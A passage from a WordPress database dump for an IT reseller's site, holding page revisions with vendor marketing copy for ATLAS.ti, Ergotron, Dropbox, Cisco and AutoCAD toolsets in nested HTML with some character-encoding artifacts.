for you to work with: Whether itâ€™s coding hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\r\n\r\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\r\n\r\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\r\n\r\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\r\n<h2 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h2>\r\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\r\n\r\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\r\n<h2 id=\"Powerful-Tool-set\">Powerful Tool set</h2>\r\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\r\n\r\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\r\n\r\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\r\n\r\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\r\n\r\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\r\n<h2 id=\"Unique-Features\">Unique Features</h2>\r\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\r\n\r\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\r\n\r\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\r\n\r\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\r\n<h2 id=\"Team-Work\">Team Work</h2>\r\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\r\n<h2 id=\"Long-Data-Lifespan\">Long Data Lifespan</h2>\r\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\r\n<h2 id=\"Great-User-Support\">Great User Support</h2>\r\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\r\n<h3>Instructional material</h3>\r\nOurÂ <a href=\"https://atlasti.com/manuals-docs/\">Quick Tour</a>Â and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\r\n<h3>Support Center</h3>\r\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\r\n\r\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\r\n<h3>Shared Expertise</h3>\r\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\r\n<iframe width=\"932\" height=\"524\" src=\"https://www.youtube.com/embed/guyThxVJj2w\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>','ATLAS.ti','','inherit','closed','closed','','1443-revision-v1','','','2018-12-12 09:19:02','2018-12-12 01:19:02','',1443,'https://bintara.com.my/blog/2018/12/12/1443-revision-v1/',0,'revision','',0),(1741,1,'2018-12-12 12:58:20','2018-12-12 04:58:20','Standing Desks, Monitor Mounts, Mobile Carts<!--more-->\n\n<img class=\"alignnone size-full wp-image-1676\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ergotron-logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','ERGOTRON','','inherit','closed','closed','','1378-autosave-v1','','','2018-12-12 12:58:20','2018-12-12 04:58:20','',1378,'https://bintara.com.my/blog/2018/12/12/1378-autosave-v1/',0,'revision','',0),(1742,1,'2018-12-12 12:56:16','2018-12-12 04:56:16','Cloud File Sharing and Storage<!--more-->\n\n<img class=\"alignnone size-full wp-image-1674\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Dropbox-logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','DROPBOX','','inherit','closed','closed','','1375-autosave-v1','','','2018-12-12 12:56:16','2018-12-12 04:56:16','',1375,'https://bintara.com.my/blog/2018/12/12/1375-autosave-v1/',0,'revision','',0),(1743,1,'2018-12-12 12:39:43','2018-12-12 04:39:43','<a href=\"http://bintara.com.my/cisco\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1672\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Cisco-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','CISCO','','inherit','closed','closed','','1363-autosave-v1','','','2018-12-12 12:39:43','2018-12-12 04:39:43','',1363,'https://bintara.com.my/blog/2018/12/12/1363-autosave-v1/',0,'revision','',0),(1857,1,'2018-12-12 12:32:09','2018-12-12 04:32:09','','meetings_4','','inherit','closed','closed','','meetings_4','','','2018-12-12 12:32:09','2018-12-12 04:32:09','',1450,'https://bintara.com.my/wp-content/uploads/2018/12/meetings_4.jpg',0,'attachment','image/jpeg',0),(1746,1,'2018-12-12 09:49:23','2018-12-12 01:49:23','3D Design, Engineering &amp; Entertainment Software<!--more-->\n\n<img class=\"alignnone size-full wp-image-1669\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Autodesk.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','AUTODESK','','inherit','closed','closed','','1344-autosave-v1','','','2018-12-12 09:49:23','2018-12-12 01:49:23','',1344,'https://bintara.com.my/blog/2018/12/12/1344-autosave-v1/',0,'revision','',0),(1747,1,'2018-12-12 09:53:20','2018-12-12 01:53:20','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h1>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">What\'s included</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h4></h4>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2018-12-12 09:53:20','2018-12-12 01:53:20','',1444,'https://bintara.com.my/blog/2018/12/12/1444-revision-v1/',0,'revision','',0),(1748,1,'2018-12-12 09:54:14','2018-12-12 01:54:14','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h1>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">What\'s included</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" 